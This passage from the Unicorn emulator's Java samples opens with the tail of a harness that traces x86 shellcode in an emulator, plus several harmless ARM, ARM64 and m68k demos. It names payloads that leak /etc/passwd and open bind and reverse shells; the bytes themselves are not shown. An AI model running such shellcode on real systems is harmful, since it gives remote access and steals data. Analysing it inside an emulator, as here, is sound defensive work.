System.out.printf("---- START FD(%d) ----\n", fd); System.out.println(join(__chains.get(fd), "\n")); System.out.printf("---- END FD(%d) ----\n", fd); } System.out.printf("\n--------------"); System.out.printf("\n| END REPORT |"); System.out.printf("\n--------------\n\n"); } } // end supported classes // utilities static String read_string(Unicorn uc, long addr) { StringBuilder ret = new StringBuilder(); char c; do { c = (char) (uc.mem_read(addr++, 1)[0] & 0xff); if (c != 0) { ret.append(c); } } while (c != 0); return ret.toString(); } static String parse_sock_address(byte[] sock_addr) { int sin_family = ((sock_addr[0] & 0xff) + (sock_addr[1] << 8)) & 0xffff; if (sin_family == 2) { // AF_INET int sin_port = ((sock_addr[3] & 0xff) + (sock_addr[2] << 8)) & 0xffff; return String.format("%d.%d.%d.%d:%d", sock_addr[4] & 0xff, sock_addr[5] & 0xff, sock_addr[6] & 0xff, sock_addr[7] & 0xff, sin_port); } else if (sin_family == 6) // AF_INET6 return ""; return null; } static void print_sockcall(String msg) { System.out.printf(">>> SOCKCALL %s\n", msg); } // end utilities public static void test_i386(byte[] code) { fd_chains.clean(); System.out.printf("Emulate i386 code\n"); try { // Initialize emulator in X86-32bit mode Unicorn mu = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory mu.mem_write(ADDRESS, code); // initialize stack mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000L); // handle interrupt ourself mu.hook_add(new MyInterruptHook(), null); // emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + code.length, 0, 0); // now print out some registers System.out.printf(">>> Emulation done\n"); } catch (UnicornException uex) { System.out.printf("ERROR: %s\n", uex.getMessage()); } fd_chains.print_report(); } public static void main(String args[]) { test_i386(X86_SEND_ETCPASSWD); test_i386(X86_BIND_TCP); test_i386(X86_REVERSE_TCP); test_i386(X86_REVERSE_TCP_2); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_arm.java000066400000000000000000000257751467524106700250200ustar00rootroot00000000000000/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate ARM code */ package samples; import java.util.Arrays; import unicorn.*; public class Sample_arm implements UnicornConst, ArmConst { /** code to be emulated {@code mov r0, #0x37; sub r1, r2, r3} */ // private static final byte[] ARM_CODE = Utils.hexToBytes("3700a0e3031042e0"); /** code to be emulated {@code nop} */ private static final byte[] ARM_CODE = Utils.hexToBytes("00f020e3"); /** code to be emulated {@code sub sp, #0xc} */ private static final byte[] THUMB_CODE = Utils.hexToBytes("83b0"); /** code to be emulated *

     * cmp r2, r3
     * it ne
     * mov r2, #0x68
     * mov r2, #0x4d
     * 
*/ private static final byte[] ARM_THUMB_COND_CODE = Utils.hexToBytes("9a4214bf68224d22"); /** code to be emulated {@code mov r0, #0x37; sub r1, r2, r3} */ private static final byte[] ARM_CODE_EB = Utils.hexToBytes("e3a00037e0421003"); /** code to be emulated {@code sub sp, #0xc} */ private static final byte[] THUMB_CODE_EB = Utils.hexToBytes("b083"); /** {@code 0xf3ef8014 - mrs r0, control} */ private static final byte[] THUMB_CODE_MRS = Utils.hexToBytes("eff31480"); /** memory address where emulation starts */ private static final long ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_arm() { long r0 = 0x1234L; // R0 register long r2 = 0x6789L; // R1 register long r3 = 0x3333L; // R2 register System.out.println("Emulate ARM code"); // Initialize emulator in ARM mode Unicorn u = new Unicorn(UC_ARCH_ARM, UC_MODE_ARM); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, ARM_CODE); // initialize machine registers u.reg_write(UC_ARM_REG_R0, r0); u.reg_write(UC_ARM_REG_R2, r2); u.reg_write(UC_ARM_REG_R3, r3); // tracing all basic blocks with customized callback u.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + ARM_CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> R0 = 0x%x\n", u.reg_read(UC_ARM_REG_R0)); System.out.format(">>> R1 = 0x%x\n", u.reg_read(UC_ARM_REG_R1)); } public static void test_thumb() { long sp = 0x1234L; // R0 register System.out.println("Emulate THUMB code"); // Initialize emulator in ARM mode Unicorn u = new Unicorn(UC_ARCH_ARM, UC_MODE_THUMB); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, THUMB_CODE); // initialize machine registers u.reg_write(UC_ARM_REG_SP, sp); // tracing all basic blocks with customized callback u.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE.length, 0, 0); // now print out some registers System.out.print(">>> Emulation done. Below is the CPU context\n"); System.out.format(">>> SP = 0x%x\n", u.reg_read(UC_ARM_REG_SP)); } public static void test_armeb() { long r0 = 0x1234L; // R0 register long r2 = 0x6789L; // R1 register long r3 = 0x3333L; // R2 register System.out.println("Emulate ARM Big-Endian code"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, ARM_CODE_EB); // initialize machine registers uc.reg_write(UC_ARM_REG_R0, r0); uc.reg_write(UC_ARM_REG_R2, r2); uc.reg_write(UC_ARM_REG_R3, r3); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + ARM_CODE_EB.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> R0 = 0x%x\n", uc.reg_read(UC_ARM_REG_R0)); System.out.format(">>> R1 = 0x%x\n", uc.reg_read(UC_ARM_REG_R1)); } public static void test_thumbeb() { long sp = 0x1234L; System.out.println("Emulate THUMB Big-Endian code"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_THUMB + UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, THUMB_CODE_EB); // initialize machine registers uc.reg_write(UC_ARM_REG_SP, sp); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. uc.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE_EB.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> SP = 0x%x\n", uc.reg_read(UC_ARM_REG_SP)); } public static void test_thumb_mrs() { System.out.println("Emulate THUMB MRS instruction"); // 0xf3ef8014 - mrs r0, control // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_THUMB); // Setup the cpu model. uc.ctl_set_cpu_model(UC_CPU_ARM_CORTEX_M33); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, THUMB_CODE_MRS); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. uc.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE_MRS.length, 0, 1); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); long pc = uc.reg_read(UC_ARM_REG_PC); System.out.format(">>> PC = 0x%x\n", pc); if (pc != ADDRESS + 4) { System.out.format("Error, PC was 0x%x, expected was 0x%x.\n", pc, ADDRESS + 4); } } private static void test_thumb_ite_internal(boolean step, long[] r2r3) { Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_THUMB); uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); uc.mem_write(ADDRESS, ARM_THUMB_COND_CODE); uc.reg_write(UC_ARM_REG_SP, 0x1234L); uc.reg_write(UC_ARM_REG_R2, 0); uc.reg_write(UC_ARM_REG_R3, 1); if (!step) { uc.emu_start(ADDRESS | 1, ADDRESS + ARM_THUMB_COND_CODE.length, 0, 0); } else { long addr = ADDRESS; for (int i = 0; i < ARM_THUMB_COND_CODE.length / 2; i++) { uc.emu_start(addr | 1, ADDRESS + ARM_THUMB_COND_CODE.length, 0, 1); addr = uc.reg_read(UC_ARM_REG_PC); } } r2r3[0] = uc.reg_read(UC_ARM_REG_R2); r2r3[1] = uc.reg_read(UC_ARM_REG_R3); } public static void test_thumb_ite() { long[] r2r3 = new long[2]; long[] step_r2r3 = new long[2]; System.out.println( "Emulate a THUMB ITE block as a whole or per instruction."); // Run once. System.out.println("Running the entire binary."); test_thumb_ite_internal(false, r2r3); System.out.format(">>> R2: %d\n", r2r3[0]); System.out.format(">>> R3: %d\n\n", r2r3[1]); // Step each instruction. System.out.println("Running the binary one instruction at a time."); test_thumb_ite_internal(true, step_r2r3); System.out.format(">>> R2: %d\n", step_r2r3[0]); System.out.format(">>> R3: %d\n\n", step_r2r3[1]); if (!Arrays.equals(r2r3, step_r2r3)) { System.out.println("Failed with ARM ITE blocks stepping!"); } } public static void test_read_sctlr() { System.out.println("Read the SCTLR register."); Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_ARM); // SCTLR. See arm reference. Arm_CP reg = new Arm_CP(15, 0, 0, 1, 0, 0, 0); long val = (Long) uc.reg_read(UC_ARM_REG_CP_REG, reg); System.out.format(">>> SCTLR = 0x%x\n", val & 0xffffffffL); System.out.format(">>> SCTLR.IE = %d\n", (val >> 31) & 1); System.out.format(">>> SCTLR.B = %d\n", (val >> 7) & 1); } public static void main(String args[]) { test_arm(); System.out.print("==========================\n"); test_thumb(); System.out.print("==========================\n"); test_armeb(); System.out.print("==========================\n"); test_thumbeb(); System.out.print("==========================\n"); test_thumb_mrs(); System.out.print("==========================\n"); test_thumb_ite(); System.out.print("==========================\n"); test_read_sctlr(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_arm64.java000066400000000000000000000236561467524106700251660ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate ARM64 code */ package samples; import java.util.Arrays; import unicorn.*; public class Sample_arm64 implements UnicornConst, Arm64Const { /** code to be emulated {@code str w11, [x13], #0; ldrb w15, [x13], #0} */ private static final byte[] ARM64_CODE = Utils.hexToBytes("ab0500b8af054038"); /** code to be emulated {@code str w11, [x13]; ldrb w15, [x13]} */ //private static final byte[] ARM64_CODE_EB = Utils.hexToBytes("b80005ab384005af"); // str w11, [x13]; private static final byte[] ARM64_CODE_EB = ARM64_CODE; /** code to be emulated {@code mrs x2, tpidrro_el0} */ private static final byte[] ARM64_MRS_CODE = Utils.hexToBytes("62d03bd5"); /** code to be emulated {@code paciza x1} */ private static final byte[] ARM64_PAC_CODE = Utils.hexToBytes("e123c1da"); // memory address where emulation starts public static final int ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_arm64_mem_fetch() { // msr x0, CurrentEL byte[] shellcode0 = { 64, 66, 56, (byte) 213 }; // .text:00000000004002C0 LDR X1, [SP,#arg_0] byte[] shellcode = { (byte) 0xE1, 0x03, 0x40, (byte) 0xF9 }; long shellcode_address = 0x4002C0L; long data_address = 0x10000000000000L; System.out.format( ">>> Emulate ARM64 fetching stack data from high address %x\n", data_address); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_ARM); uc.mem_map(data_address, 0x30000, UC_PROT_ALL); uc.mem_map(0x400000, 0x1000, UC_PROT_ALL); uc.reg_write(UC_ARM64_REG_SP, data_address); byte[] data = new byte[8]; Arrays.fill(data, (byte) 0xc8); uc.mem_write(data_address, data); uc.mem_write(shellcode_address, shellcode0); uc.mem_write(shellcode_address + 4, shellcode); uc.emu_start(shellcode_address, shellcode_address + 4, 0, 0); long x0 = uc.reg_read(UC_ARM64_REG_X0); System.out.format(">>> x0(Exception Level)=%x\n", x0 >> 2); uc.emu_start(shellcode_address + 4, shellcode_address + 8, 0, 0); long x1 = uc.reg_read(UC_ARM64_REG_X1); System.out.format(">>> X1 = 0x%x\n", x1); } public static void test_arm64() { long x11 = 0x12345678; // X11 register long x13 = 0x10000 + 0x8; // X13 register long x15 = 0x33; // X15 register System.out.println("Emulate ARM64 code"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_ARM); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, ARM64_CODE); // initialize machine registers uc.reg_write(UC_ARM64_REG_X11, x11); uc.reg_write(UC_ARM64_REG_X13, x13); uc.reg_write(UC_ARM64_REG_X15, x15); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + ARM64_CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.println(">>> As little endian, X15 should be 0x78:"); System.out.format(">>> X15 = 0x%x\n", uc.reg_read(UC_ARM64_REG_X15)); } public static void test_arm64eb() { long x11 = 0x12345678; // X11 register long x13 = 0x10000 + 0x8; // X13 register long x15 = 0x33; // X15 register System.out.println("Emulate ARM64 Big-Endian code"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_ARM + UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, ARM64_CODE_EB); // initialize machine registers uc.reg_write(UC_ARM64_REG_X11, x11); uc.reg_write(UC_ARM64_REG_X13, x13); uc.reg_write(UC_ARM64_REG_X15, x15); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + ARM64_CODE_EB.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.println(">>> As big endian, X15 should be 0x78:"); System.out.format(">>> X15 = 0x%x\n", uc.reg_read(UC_ARM64_REG_X15)); } public static void test_arm64_sctlr() { long val; System.out.println("Read the SCTLR register."); Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM); // SCTLR_EL1. See arm reference. Arm64_CP reg = new Arm64_CP(1, 0, 3, 0, 0); val = (long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); System.out.format(">>> SCTLR_EL1 = 0x%x\n", val); reg.op1 = 0b100; val = (long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); System.out.format(">>> SCTLR_EL2 = 0x%x\n", val); } private static final Arm64SysHook hook_mrs = (uc, reg, cp_reg, user_data) -> { System.out .println(">>> Hook MSR instruction. Write 0x114514 to X2."); uc.reg_write(reg, 0x114514L); // Skip return 1; }; public static void test_arm64_hook_mrs() { System.out.println("Hook MRS instruction."); Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM); uc.mem_map(0x1000, 0x1000, UC_PROT_ALL); uc.mem_write(0x1000, ARM64_MRS_CODE); uc.hook_add(hook_mrs, UC_ARM64_INS_MRS, 1, 0, null); uc.emu_start(0x1000, 0x1000 + ARM64_MRS_CODE.length, 0, 0); System.out.format(">>> X2 = 0x%x\n", uc.reg_read(UC_ARM64_REG_X2)); } /* Test PAC support in the emulator. Code adapted from https://github.com/unicorn-engine/unicorn/issues/1789#issuecomment-1536320351 */ public static void test_arm64_pac() { long x1 = 0x0000aaaabbbbccccL; System.out.println("Try ARM64 PAC"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_ARM); uc.ctl_set_cpu_model(UC_CPU_ARM64_MAX); uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); uc.mem_write(ADDRESS, ARM64_PAC_CODE); uc.reg_write(UC_ARM64_REG_X1, x1); /** Initialize PAC support **/ Arm64_CP reg; // SCR_EL3 reg = new Arm64_CP(1, 1, 3, 6, 0); reg.val = (Long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); // NS && RW && API reg.val |= (1 | (1L << 10) | (1L << 17)); uc.reg_write(UC_ARM64_REG_CP_REG, reg); // SCTLR_EL1 reg = new Arm64_CP(1, 0, 3, 0, 0); reg.val = (Long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); // EnIA && EnIB reg.val |= (1L << 31) | (1L << 30); uc.reg_write(UC_ARM64_REG_CP_REG, reg); // HCR_EL2 reg = new Arm64_CP(1, 1, 3, 4, 0); reg.val = (Long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); // HCR.API reg.val |= (1L << 41); uc.reg_write(UC_ARM64_REG_CP_REG, reg); /** Check that PAC worked **/ uc.emu_start(ADDRESS, ADDRESS + ARM64_PAC_CODE.length, 0, 0); long new_x1 = uc.reg_read(UC_ARM64_REG_X1); System.out.format("X1 = 0x%x\n", new_x1); if (new_x1 == x1) { System.out.println("FAIL: No PAC tag added!"); } else { // Expect 0x1401aaaabbbbccccULL with the default key System.out.println("SUCCESS: PAC tag found."); } } public static void main(String args[]) { test_arm64_mem_fetch(); System.out.println("-------------------------"); test_arm64(); System.out.println("-------------------------"); test_arm64eb(); System.out.println("-------------------------"); test_arm64_sctlr(); System.out.println("-------------------------"); test_arm64_hook_mrs(); System.out.println("-------------------------"); test_arm64_pac(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_ctl.java000066400000000000000000000122141467524106700250030ustar00rootroot00000000000000package samples; import java.util.Arrays; import unicorn.*; public class Sample_ctl implements UnicornConst, X86Const { /** Code to be emulated *
     *   cmp eax, 0;
     *   jg lb;
     *   inc eax;
     *   nop;
     * lb:
     *   inc ebx;
     *   nop;
     * 
*/ private static final byte[] X86_JUMP_CODE = Utils.hexToBytes("83f8007f0240904390"); /** memory address where emulation starts */ private static final long ADDRESS = 0x10000; public static void test_uc_ctl_read() { System.out.println("Reading some properties by uc_ctl."); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // Let's query some properties by uc_ctl. int mode = uc.ctl_get_mode(); int arch = uc.ctl_get_arch(); long timeout = uc.ctl_get_timeout(); int pagesize = uc.ctl_get_page_size(); System.out.format(">>> mode = %d, arch = %d, timeout=%d, pagesize=%d\n", mode, arch, timeout, pagesize); } private static final EdgeGeneratedHook trace_new_edge = (uc, cur, prev, data) -> { System.out.format(">>> Getting a new edge from 0x%x to 0x%x.\n", prev.pc + prev.size - 1, cur.pc); }; public static void test_uc_ctl_exits() { long r_eax, r_ebx; long exits[] = { ADDRESS + 6, ADDRESS + 8 }; System.out.println("Using multiple exits by uc_ctl."); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); uc.mem_map(ADDRESS, 0x1000, UC_PROT_ALL); // Write our code to the memory. uc.mem_write(ADDRESS, X86_JUMP_CODE); // We trace if any new edge is generated. uc.hook_add(trace_new_edge, 1, 0, null); // Enable multiple exits. uc.ctl_exits_enabled(true); uc.ctl_set_exits(exits); // This should stop at ADDRESS + 6 and increase eax, even thouhg we don't // provide an exit. uc.emu_start(ADDRESS, 0, 0, 0); r_eax = uc.reg_read(UC_X86_REG_EAX); r_ebx = uc.reg_read(UC_X86_REG_EBX); System.out.format( ">>> eax = %d and ebx = %d after the first emulation\n", r_eax, r_ebx); // This should stop at ADDRESS + 8, even though we don't provide an exit. uc.emu_start(ADDRESS, 0, 0, 0); r_eax = uc.reg_read(UC_X86_REG_EAX); r_ebx = uc.reg_read(UC_X86_REG_EBX); System.out.format( ">>> eax = %d and ebx = %d after the second emulation\n", r_eax, r_ebx); } private static final int TB_COUNT = 8; private static final int TCG_MAX_INSNS = 512; // from tcg.h private static final int CODE_LEN = TB_COUNT * TCG_MAX_INSNS; private static double time_emulation(Unicorn uc, long start, long end) { long t1 = System.nanoTime(); uc.emu_start(start, end, 0, 0); long t2 = System.nanoTime(); return (t2 - t1) / 1000000.0; } public static void test_uc_ctl_tb_cache() { byte[] code = new byte[CODE_LEN]; double standard, cached, evicted; System.out.println( "Controlling the TB cache in a finer granularity by uc_ctl."); // Fill the code buffer with NOP. Arrays.fill(code, (byte) 0x90); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); uc.mem_map(ADDRESS, 0x10000, UC_PROT_ALL); // Write our code to the memory. uc.mem_write(ADDRESS, code); // We trace if any new edge is generated. // Note: In this sample, there is only **one** basic block while muliple // translation blocks is generated due to QEMU tcg buffer limit. In this // case, we don't consider it as a new edge. uc.hook_add(trace_new_edge, 1, 0, null); // Do emulation without any cache. standard = time_emulation(uc, ADDRESS, ADDRESS + CODE_LEN); // Now we request cache for all TBs. for (int i = 0; i < TB_COUNT; i++) { TranslationBlock tb = uc.ctl_request_cache(ADDRESS + i * TCG_MAX_INSNS); System.out.format( ">>> TB is cached at 0x%x which has %d instructions with %d bytes.\n", tb.pc, tb.icount, tb.size); } // Do emulation with all TB cached. cached = time_emulation(uc, ADDRESS, ADDRESS + CODE_LEN); // Now we clear cache for all TBs. for (int i = 0; i < TB_COUNT; i++) { uc.ctl_remove_cache(ADDRESS + i * TCG_MAX_INSNS, ADDRESS + i * TCG_MAX_INSNS + 1); } // Do emulation with all TB cache evicted. evicted = time_emulation(uc, ADDRESS, ADDRESS + CODE_LEN); System.out.format( ">>> Run time: First time: %fms, Cached: %fms, Cache evicted: %fms\n", standard, cached, evicted); } public static final void main(String[] args) { test_uc_ctl_read(); System.out.println("===================="); test_uc_ctl_exits(); System.out.println("===================="); test_uc_ctl_tb_cache(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_m68k.java000066400000000000000000000132201467524106700250040ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn Emulator Engine */ /* By Loi Anh Tuan, 2015 */ /* Sample code to demonstrate how to emulate m68k code */ package samples; import unicorn.*; public class Sample_m68k implements UnicornConst, M68kConst { // code to be emulated public static final byte[] M68K_CODE = { 118, -19 }; // movq #-19, %d3 // memory address where emulation starts public static final int ADDRESS = 0x10000; // callback for tracing basic blocks private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; // callback for tracing instructions private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_m68k() { long d0 = 0x0000L; // d0 data register long d1 = 0x0000L; // d1 data register long d2 = 0x0000L; // d2 data register long d3 = 0x0000L; // d3 data register long d4 = 0x0000L; // d4 data register long d5 = 0x0000L; // d5 data register long d6 = 0x0000L; // d6 data register long d7 = 0x0000L; // d7 data register long a0 = 0x0000L; // a0 address register long a1 = 0x0000L; // a1 address register long a2 = 0x0000L; // a2 address register long a3 = 0x0000L; // a3 address register long a4 = 0x0000L; // a4 address register long a5 = 0x0000L; // a5 address register long a6 = 0x0000L; // a6 address register long a7 = 0x0000L; // a6 address register long pc = 0x0000L; // program counter long sr = 0x0000L; // status register System.out.print("Emulate M68K code\n"); // Initialize emulator in M68K mode Unicorn u = new Unicorn(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, M68K_CODE); // initialize machine registers u.reg_write(UC_M68K_REG_D0, d0); u.reg_write(UC_M68K_REG_D1, d1); u.reg_write(UC_M68K_REG_D2, d2); u.reg_write(UC_M68K_REG_D3, d3); u.reg_write(UC_M68K_REG_D4, d4); u.reg_write(UC_M68K_REG_D5, d5); u.reg_write(UC_M68K_REG_D6, d6); u.reg_write(UC_M68K_REG_D7, d7); u.reg_write(UC_M68K_REG_A0, a0); u.reg_write(UC_M68K_REG_A1, a1); u.reg_write(UC_M68K_REG_A2, a2); u.reg_write(UC_M68K_REG_A3, a3); u.reg_write(UC_M68K_REG_A4, a4); u.reg_write(UC_M68K_REG_A5, a5); u.reg_write(UC_M68K_REG_A6, a6); u.reg_write(UC_M68K_REG_A7, a7); u.reg_write(UC_M68K_REG_PC, pc); u.reg_write(UC_M68K_REG_SR, sr); // tracing all basic blocks with customized callback u.hook_add(hook_block, 1, 0, null); // tracing all instruction u.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + M68K_CODE.length, 0, 0); // now print out some registers System.out.print(">>> Emulation done. Below is the CPU context\n"); d0 = u.reg_read(UC_M68K_REG_D0); d1 = u.reg_read(UC_M68K_REG_D1); d2 = u.reg_read(UC_M68K_REG_D2); d3 = u.reg_read(UC_M68K_REG_D3); d4 = u.reg_read(UC_M68K_REG_D4); d5 = u.reg_read(UC_M68K_REG_D5); d6 = u.reg_read(UC_M68K_REG_D6); d7 = u.reg_read(UC_M68K_REG_D7); a0 = u.reg_read(UC_M68K_REG_A0); a1 = u.reg_read(UC_M68K_REG_A1); a2 = u.reg_read(UC_M68K_REG_A2); a3 = u.reg_read(UC_M68K_REG_A3); a4 = u.reg_read(UC_M68K_REG_A4); a5 = u.reg_read(UC_M68K_REG_A5); a6 = u.reg_read(UC_M68K_REG_A6); a7 = u.reg_read(UC_M68K_REG_A7); pc = u.reg_read(UC_M68K_REG_PC); sr = u.reg_read(UC_M68K_REG_SR); System.out.format(">>> A0 = 0x%x\t\t>>> D0 = 0x%x\n", a0, d0); System.out.format(">>> A1 = 0x%x\t\t>>> D1 = 0x%x\n", a1, d1); System.out.format(">>> A2 = 0x%x\t\t>>> D2 = 0x%x\n", a2, d2); System.out.format(">>> A3 = 0x%x\t\t>>> D3 = 0x%x\n", a3, d3); System.out.format(">>> A4 = 0x%x\t\t>>> D4 = 0x%x\n", a4, d4); System.out.format(">>> A5 = 0x%x\t\t>>> D5 = 0x%x\n", a5, d5); System.out.format(">>> A6 = 0x%x\t\t>>> D6 = 0x%x\n", a6, d6); System.out.format(">>> A7 = 0x%x\t\t>>> D7 = 0x%x\n", a7, d7); System.out.format(">>> PC = 0x%x\n", pc); System.out.format(">>> SR = 0x%x\n", sr); } public static void main(String args[]) { test_m68k(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_mips.java000066400000000000000000000106351467524106700251760ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 